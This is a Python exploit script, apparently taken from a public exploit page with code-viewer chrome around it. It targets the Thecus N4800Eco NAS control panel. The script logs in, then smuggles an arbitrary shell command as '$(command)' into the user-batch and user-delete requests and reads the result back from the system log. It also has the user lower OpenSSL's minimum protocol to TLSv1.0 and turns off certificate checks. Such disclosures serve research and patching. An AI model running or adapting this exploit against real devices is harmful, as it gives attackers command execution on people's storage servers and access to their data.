98 lines
No EOL
3.1 KiB
Python
Executable file
98 lines
No EOL
3.1 KiB
Python
Executable file
# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection
|
|
# Date: 01/06/2021
|
|
# Exploit Author: Metin Yunus Kandemir
|
|
# Vendor Homepage: http://www.thecus.com/
|
|
# Software Link: http://www.thecus.com/product.php?PROD_ID=83
|
|
# Version: N4800Eco
|
|
# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection
|
|
|
|
|
|
#!/usr/bin/python3
|
|
import requests
|
|
import sys
|
|
import urllib3
|
|
|
|
|
|
# To fix SSL error that occurs when the script is started.
|
|
# 1- Open /etc/ssl/openssl.cnf file
|
|
# At the bottom of the file:
|
|
# [system_default_sect]
|
|
# MinProtocol = TLSv1.2
|
|
# CipherString = DEFAULT@SECLEVEL=2
|
|
# 2- Set value of MinProtocol as TLSv1.0
|
|
|
|
|
|
def readResult(s, target):
|
|
d = {
|
|
"fun": "setlog",
|
|
"action": "query",
|
|
"params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
|
|
}
|
|
url = "http://" + target + "/adm/setmain.php"
|
|
resultReq = s.post(url, data=d, verify=False)
|
|
dict = resultReq.text.split()
|
|
print("[+] Reading system log...\n")
|
|
print(dict[5:8]) #change this range to read whole output of the command
|
|
|
|
def delUser(s, target, command):
|
|
d = {
|
|
"action": "delete",
|
|
"username": "$("+command+")"
|
|
}
|
|
url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
|
|
delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
|
|
|
|
if 'Local User remove succeeds' in delUserReq.text:
|
|
print('[+] %s command was executed successfully' % command)
|
|
else:
|
|
print('[-] %s command was not executed!' %command)
|
|
sys.exit(1)
|
|
readResult(s, target)
|
|
|
|
def addUser(s, target, command):
|
|
d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
|
|
url = "http://" + target + "/adm/setmain.php?fun=setbatch"
|
|
addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
|
|
|
|
if 'Users and groups were created successfully.' in addUserReq.text:
|
|
print('[+] Users and groups were created successfully')
|
|
else:
|
|
print('[-] Users and groups were not created')
|
|
sys.exit(1)
|
|
delUser(s, target, command)
|
|
|
|
def login(target, username, password, command=None):
|
|
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
|
|
s = requests.Session()
|
|
d = {
|
|
"&eplang": "english",
|
|
"p_pass": password,
|
|
"p_user": username,
|
|
"username": username,
|
|
"pwd": password,
|
|
"action": "login",
|
|
"option": "com_extplorer"
|
|
}
|
|
url = "http://" + target + "/adm/login.php"
|
|
loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
|
|
|
|
if '"success":true' in loginReq.text:
|
|
print('[+] Authentication successful')
|
|
elif '"success":false' in loginReq.text:
|
|
print('[-] Authentication failed!')
|
|
sys.exit(1)
|
|
else:
|
|
print('[-] Something went wrong!')
|
|
sys.exit(1)
|
|
addUser(s, target, command)
|
|
|
|
def main(args):
|
|
if len(args) != 5:
|
|
print("usage: %s targetIp:port username password command" % (args[0]))
|
|
print("Example 192.168.1.13:80 admin admin id")
|
|
sys.exit(1)
|
|
login(target=args[1], username=args[2], password=args[3], command=args[4])
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main(args=sys.argv) |